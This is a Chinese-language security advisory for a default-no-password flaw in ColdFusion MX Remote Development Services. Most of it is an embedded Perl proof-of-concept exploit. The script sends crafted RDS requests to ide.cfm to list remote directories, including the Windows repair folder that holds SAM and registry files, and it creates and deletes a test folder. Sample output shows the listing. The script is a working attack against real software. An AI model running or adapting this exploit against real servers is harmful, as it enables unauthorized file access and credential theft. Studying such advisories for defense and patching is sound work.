Macromedia ColdFusion MX 远程开发服务默认NULL密码漏洞发布时间:2003-07-05 更新时间:2003-07-05 严重程度:高 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8110 受影响系统 Macromedia ColdFusion Server MX Professional详细描述 使用ColdFusion MX可以配置强大的WEB应用和WEB服务,新的版本支持J2EE应用服务。ColdFusion MX可以使用WEB应用开发服务。 sion RDS允许开发者安全访问文件和数据,调试CFML代码。开发者可以使用RDS通过ColdFusion Studio, Homesite+,和Dreamweaver MX访问问和数据库。如果正确配置,RDS允许静态密码来验证远程开发者访问。但是默认情况下,RDS不需要任何密码进行验证,因此任何人可以通过RDS兼容开发应用程序访问 CF服务器。 另外,当与ColdFusion MX服务器通信时,RDS服务允许攻击者未授权访问服务器上的文件。 测试代码 #!/usr/bin/perl # RDS_c_Dump.pl # victim1@angrypacket.com ## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or modification of this code you are completely on your OWN, # I or rs2112 take no responsibilty for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against # attack and thats it. ## CF 6 MX Server does several things in order to get remote dir structure so we will need # to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection just FYI, # in like one full HTTP1/1 session witin netcat. # # I would like to point out that the ASPSESSID never validates so you can change this on the fly. # # Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and # they attempted to belittle my intelligence on the phone.. . OH and yes I did email them several times with no response. # # You can Write as well, I have tested and this works fine. If you change the file to and *.exe it will attempt to become and # 16bit dos application on the remote box FYI. # # Requests are sent in this order to get a remote dir structure: # NOTE: Create dir retrieval array. # # ANOTHER NOTE: # Due to certian current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code, # If you email me I will not send it to you, so basically dont bother. # # Im sorry for being such a foil fart but hey, you understand im shure. # # Sample output: # -------------------------------- # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl # # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1 # # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: # Content-Length: 37 # Please wait.. .. # HTTP/1.1 100 Continue # Server: Microsoft-IIS/5.0 # Date: Tue, 01 Jul 2003 10:30:43 GMT # # HTTP/1.1 200 OK # Server: Microsoft-IIS/5.0 # Date: Tue, 01 Jul 2003 10:30:43 GMT # Connection: close # Content-Type: text/html # # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3: # sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8: # software1:67:65331203:0,02:F:6:system1:66:9748483:0,0 # Vic7im1@cipher:~/Scripts/RDS_Sploit$ # ---------------------------------- use strict; use IO::Socket; use vars qw($response @clength @rarray); ## Dreamweaver string requests to ide.cfm ## -------------------------------------- #1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28 #3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47 #4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32 #6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50 #7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51 #9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24 #11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53 #13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53 #15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51 #17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29 #19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46 #20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37 # Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know # the $string_val. @clength = ( "Content-Length: 46", "Content-Length: 28", "Content-Length: 47", "Content-Length: 46", #"Content-Length: 32", #"Content-Length: 50", "Content-Length: 46", "Content-Length: 51", "Content-Length: 46", "Content-Length: 24", "Content-Length: 46", "Content-Length: 53", "Content-Length: 46", "Content-Length: 53", "Content-Length: 46", "Content-Length: 51", "Content-Length: 46", "Content-Length: 29", "Content-Length: 46", "Content-Length: 37" ); @rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:7:C:/_mm/STR:1:*STR:0:", "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", #"3:STR:10:C:/_notes/STR:1:*STR:0:", #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:3:C:/STR:1:*STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:", "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:", "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:" ); system("clear"); # change target addy below. my $TARGET = "192.168.0.100"; my $PORT = "80"; my $STRING = "C:/WINNT/repair"; my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n"; print "Generating Socket with Array Directory Values.\n"; my ( $i, $c); for ( $i = 0; $i < @rarray; $i++ ) { for ( $c = 0; $c < @clength; $c++ ) { if( $i == $c ) { &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]); } } } sub gen_sock() { my $sock = new IO::Socket::INET(PeerAddr => $TARGET, PeerPort => $PORT, Proto => 'tcp', ); die "Socket Could not be established ! $!" unless $sock; print "Target: $TARGET:$PORT\n"; print "$POST\n"; print "Request String Value: $rarray[$i]\n"; print "$clength[$c]\n"; print "Please wait.. ..\n"; print $sock "$POST"; print $sock "Content-Type: application/x-ColdFusionIDE\r\n"; print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n"; print $sock "Host: $TARGET\r\n"; print $sock "$clength[$c]\r\n"; print $sock "Connection: Keep-Alive\r\n"; print $sock "Cache-Control: no-cache\r\n"; print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n"; print $sock "\r\n"; print $sock "$rarray[$i]"; # lets return and print data to term while($response = <$sock>) { chomp($response); print "$response\n"; } close($sock); } +----------- -- - + disclaimer +-------- -- - READ IN THE SCRIPT. Oh and Happy 4th of July ! - -- ------------------------- #EOT 解决方案 尚无 相关信息 rs2112 <rs2112@hushmail.com> and Victim1 <victim1@angrypacket.com>. 参考:http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt |
